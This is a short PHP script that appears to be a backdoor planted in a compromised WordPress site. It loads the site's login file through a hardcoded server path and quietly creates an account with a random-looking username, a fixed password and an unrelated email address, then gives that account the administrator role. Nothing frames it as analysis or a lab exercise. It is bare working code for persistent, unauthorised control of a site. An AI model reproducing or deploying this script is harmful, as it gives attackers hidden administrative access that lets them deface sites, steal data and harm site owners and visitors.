<?php
// Load WordPress framework
require_once('/home/mybf1/public_html/mentol.bf1.my/wp-login.php');

// Define new admin user details
$new_username = 'aasdjha';
$new_password = 'asdf@#$sae14！';
$new_name= 'Tishk International Univeristy';
$new_posts= '5';
$new_email = 'busin@enoactic.com';

// Check if user already exists
if ( !username_exists($new_username) && !email_exists($new_email) ) {
    // Create new user
    $user_id = wp_create_user( $new_username, $new_password, $new_email );
    // Set the role to administrator
    $user = new WP_User( $user_id );
    $user->set_role( 'administrator' );

    echo 'User created successfully.';
} else {
    echo 'User already exists.';
}
?>